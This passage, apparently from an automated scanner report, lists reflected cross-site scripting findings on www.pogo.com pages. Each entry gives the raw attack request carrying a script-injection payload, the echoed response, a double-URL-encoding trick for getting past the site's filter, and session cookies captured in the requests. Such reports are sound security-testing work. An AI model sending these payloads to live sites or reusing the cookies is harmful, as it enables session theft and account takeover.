GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookied7809"><script>alert(1)</script>9c836ad6bee HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/?f9258%22%3E%3Cscript%3Ealert(document.cookied7809"><script>alert(1)</script>9c836ad6bee"/> ...[SNIP]...
3.602. http://www.pogo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pogo.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 575b9"><script>alert(1)</script>25a93ddaf89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie&575b9"><script>alert(1)</script>25a93ddaf89=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/?f9258%22%3E%3Cscript%3Ealert(document.cookie&575b9"><script>alert(1)</script>25a93ddaf89=1"/> ...[SNIP]...
3.603. http://www.pogo.com/account/my-account/recover.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.pogo.com
Path: /account/my-account/recover.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcb5"><a>43948eebdae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /account/my-account/recover.do?5fcb5"><a>43948eebdae=1 HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/account/verify-password.do Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536425818-New%7C1297128425818%3B
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/account/my-account/recover.do?5fcb5"><a>43948eebdae=1"/> ...[SNIP]...
3.604. http://www.pogo.com/action/pogo/createAccount.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pogo.com
Path: /action/pogo/createAccount.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 152d8</script><script>alert(1)</script>35e94ca2073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/createAccount.do?pageSection=header_reg&152d8</script><script>alert(1)</script>35e94ca2073=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c15b</script><script>alert(1)</script>11b14ca1e6d was submitted in the pageSection parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/createAccount.do?pageSection=header_reg1c15b</script><script>alert(1)</script>11b14ca1e6d HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2874%253c%252fscript%253e37c38751014 was submitted in the pageSection parameter. This input was echoed as c2874</script>37c38751014 in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /card-games?pageSection=categorybar_cardc2874%253c%252fscript%253e37c38751014 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the f9258%22%3E%3Cscript%3Ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10188"><script>alert(1)</script>130c5eaf7ce was submitted in the f9258%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /home/home.jsp?f9258%22%3E%3Cscript%3Ealert(110188"><script>alert(1)</script>130c5eaf7ce HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the f9258%22%3E%3Cscript%3Ealert(1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971e1</script><script>alert(1)</script>9aa152ea55e was submitted in the f9258%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1971e1</script><script>alert(1)</script>9aa152ea55e HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';} s.tl(source,'o',pageName); } s.referrer="http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1971e1</script><script>alert(1)</script>9aa152ea55e"; s.eVar2="pogo"; s.pageName="Unauth Free Pogo Home Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Unauth Free Pogo Home Page:Non Authenticated"; s.prop8="Non Authenticated"; if (typeof ...[SNIP]...
3.609. http://www.pogo.com/home/home.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pogo.com
Path: /home/home.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9258"><script>alert(1)</script>4225969d669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /home/home.jsp?f9258"><script>alert(1)</script>4225969d669=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/?f9258"><script>alert(1)</script>4225969d669=1"/> ...[SNIP]...
3.610. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pogo.com
Path: /hotdeploy/us/homepage/clubpogo-info.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a423</script><script>alert(1)</script>2d1ef703044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/homepage/clubpogo-info.jsp?5a423</script><script>alert(1)</script>2d1ef703044=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-e ...[SNIP]... p6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';} s.tl(source,'o',pageName); } s.referrer="http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp?5a423</script><script>alert(1)</script>2d1ef703044=1"; s.eVar2="pogo"; s.pageName="ClubPogo.com 5by5 0708 US page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:marketing::ClubPogo.com 5by5 0708 US page:Non Authenticated"; s.prop8="Non Authent ...[SNIP]...
3.611. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pogo.com
Path: /hotdeploy/us/homepage/clubpogo-info.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eadd"><script>alert(1)</script>5428e23fbf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /hotdeploy/us/homepage/clubpogo-info.jsp?9eadd"><script>alert(1)</script>5428e23fbf7=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the &intcmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70262%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02cc5d04880 was submitted in the &intcmp parameter. This input was echoed as 70262</script><script>alert(1)</script>02cc5d04880 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the &intcmp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_170262%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02cc5d04880&pageSection=free_home_mtx_shopping HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the intcmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c88%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e723870b2cf6 was submitted in the intcmp parameter. This input was echoed as 75c88</script><script>alert(1)</script>723870b2cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the intcmp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
